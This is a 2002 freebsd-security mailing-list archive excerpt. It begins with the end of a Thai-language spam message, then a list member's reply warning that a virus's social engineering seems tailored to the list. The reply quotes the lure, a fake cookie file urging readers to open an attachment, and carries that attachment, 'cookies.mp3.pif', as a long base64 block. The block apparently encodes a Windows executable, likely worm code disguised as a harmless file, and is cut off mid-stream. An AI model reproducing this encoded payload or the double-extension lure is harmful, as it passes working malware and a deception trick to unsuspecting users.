09:55:11.0687 (UTC) FILETIME=[6581BD70:01C21C2E] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0205_01C21C67.C7D305E0 Content-Type: text/plain; charset="windows-874" Content-Transfer-Encoding: quoted-printable = =C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8=E3=B9=CD=B9= =D2=A4=B5 =B7=D3=E4=B4=E9=A7=E8=D2=C2 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA =BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2 30,000 / = =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9 =E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7 ! = =E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7=E9=D2=C1=D1=B9= =CB=C3=D7=CD=E0=BB=C5=E8=D2 =A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4=A8 = International E-Business =E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2=B9 = =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20 = =E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D4=E8=C1=C3= =D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4=D7=CD=B9 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 Part-time 15,000 =B6=D6=A7 60,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 7- 14 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 = =E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA=BA=B7= =D3=A7=D2=B9 full-time 30,000 =B6=D6=A7 170,000 =BA=D2=B7/=E0=B4=D7=CD=B9 =E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 : 20- 40 =AA=C1. = /=CA=D1=BB=B4=D2=CB=EC=20 =A2=E8=D2=C7=B4=D5 ! =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5 =A1=C3=D8=A7=E0=B7=BE=CF = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5 = =CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2=C3=BA=C3= =C3=C2=D2=C2 =BF=C3=D5 !!! = ************************************************************* = =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB=B6=D6=A7=A4= =D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8=B5=E9=CD=A7= =A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe" =20 =20 ------=_NextPart_000_0205_01C21C67.C7D305E0 Content-Type: text/html; charset="windows-874" Content-Transfer-Encoding: quoted-printable

=C3=D0=BA=BA=A1=D2=C3=B7=D3=A7=D2=B9=A2=CD=A7=B8=D8=C3=A1=D4=A8= =E3=B9=CD=B9=D2=A4=B5
=B7=D3=E4=B4=E9=A7=E8=D2=C2=20 = =E1=C5=D0=CA=C3=E9=D2=A7=C3=D2=C2=E4=B4=E9=A7=D2=C1=A8=D2=A1=A1=D2=C3=B7=D3= =A7=D2=B9=BC=E8=D2=B9=C3=D0=BA=BA
=BC=C1=C1=D5=C3=D2=C2=E4=B4=E9=C1=D2=A1=A1=C7=E8=D2=20 30,000 / =E0=B4=D7=CD=B9 = =A8=D2=A1=A1=D2=C3=B7=D3=A7=D2=B9=E0=BE=D5=C2=A7=C7=D1=B9=C5=D0 2-3=20 = =AA=D1=E8=C7=E2=C1=A7=E0=B7=E8=D2=B9=D1=E9=B9
=E2=CD=A1=D2=CA=C1=D2=B6=D6=A7=A4=D8=B3=E1=C5=E9=C7=20 !
=E0=CB=C5=D7=CD=E1=B5=E8=E0=BE=D5=C2=A7=A4=D8=B3=A8=D0=A4=C7= =E9=D2=C1=D1=B9=CB=C3=D7=CD=E0=BB=C5=E8=D2

=A1=D2=C3=BA=C3=C3=C2=D2=C2=E1=B9=D0=B9=D3=B8=D8=C3=A1=D4= =A8 International=20 E-Business
=E0=C3=D5=C2=B9=C3=D9=E9=C7=D4=B8=D5=A1=D2=C3=B7=D3=A7=D2= =B9 =B8=D8=C3=A1=D4=A8=B9=D2=B9=D2=AA=D2=B5=D4 =BA=B9 Internet=20
=E0=C3=D5=C2=B9=C3=D9=E9=E1=BC=B9=A1=D2=C3=B7=D3=A7=D2=B9= =E0=BE=D4=E8=C1=C3=D2=C2=E4=B4=E9=BE=D4=E0=C8=C9=E3=B9=E1=B5=E8=C5=D0=E0=B4= =D7=CD=B9

=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 Part-time
15,000 =B6=D6=A7 = 60,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 7- 14 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC=20 =
=E1=BC=B9=C3=D2=C2=E4=B4=E9=CD=C2=E8=D2=A7=A8=C3=D4=A7=A8=D1=A7=E1=BA= =BA=B7=D3=A7=D2=B9 full-time
30,000 =B6=D6=A7 170,000=20 = =BA=D2=B7/=E0=B4=D7=CD=B9
=E0=C7=C5=D2=B7=D5=E8=B5=E9=CD=A7=E3=AA=E9 = : 20- 40 =AA=C1. /=CA=D1=BB=B4=D2=CB=EC

=A2=E8=D2=C7=B4=D5=20 !     = =CA=D3=CB=C3=D1=BA = =BC=D9=E9=B7=D5=E8=CD=C2=D9=E8=E3=B9=E0=A2=B5=20 =A1=C3=D8=A7=E0=B7=BE=CF  = =E1=C5=D0=BB=C3=D4=C1=C5=B1=C5
=CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2= =C3=BA=C3=C3=C2=D2=C2   = =BF=C3=D5 !!!
*************************************************************
          &nbs= p; =20 =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB= =B6=D6=A7=A4=D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8= =B5=E9=CD=A7=A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1
=   =20 =            =        =20 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail=20 = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe"

------=_NextPart_000_0205_01C21C67.C7D305E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3: 8:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id B3C5D37B72C for ; Tue, 25 Jun 2002 02:56:11 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5P9uA2n073277; Tue, 25 Jun 2002 21:56:10 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Tue, 25 Jun 2002 21:56:10 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Hotel Shefayim Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fw: cookies In-Reply-To: <0GY900L4D8NLXI@mxout2.netvision.net.il> Message-ID: <20020625215454.U73236-101000@a2> MIME-Version: 1.0 Content-Type: MULTIPART/Mixed; BOUNDARY="Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ)" Content-ID: <20020625215454.A73236@a2> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ) Content-Type: TEXT/Plain; CHARSET=US-ASCII Content-ID: <20020625215454.T73236@a2> Tricky. Is it my imagination or does this viruses social engineering look a bit too tailored for the audience here? Andrew McNaughton On Tue, 25 Jun 2002, Hotel Shefayim wrote: > Date: Tue, 25 Jun 2002 12:20:21 +0000 (PM) > From: Hotel Shefayim > To: freebsd-security@FreeBSD.ORG > Subject: Fw: cookies > > # Internet Explorer cookie file, exported for Netscape browsers. > doubleclick.net TRUE / FALSE 1920862683 id 800000014a92169 > cgi.sexswap.com TRUE / FALSE 966509358 gotoadlocation00 136 hadashot.com > TRUE / FALSE 2051585943 SITESERVER IDJ749738dddfe37cfe03e55bdbc0cbba > forums.ort.org.i > . > . > See the attachement > > --Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ) Content-Type: APPLICATION/OCTET-STREAM; NAME="cookies.mp3.pif" Content-Transfer-Encoding: BASE64 Content-ID: <20020625215454.M73236@a2> Content-Description: Content-Disposition: ATTACHMENT; FILENAME=" .pif" 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 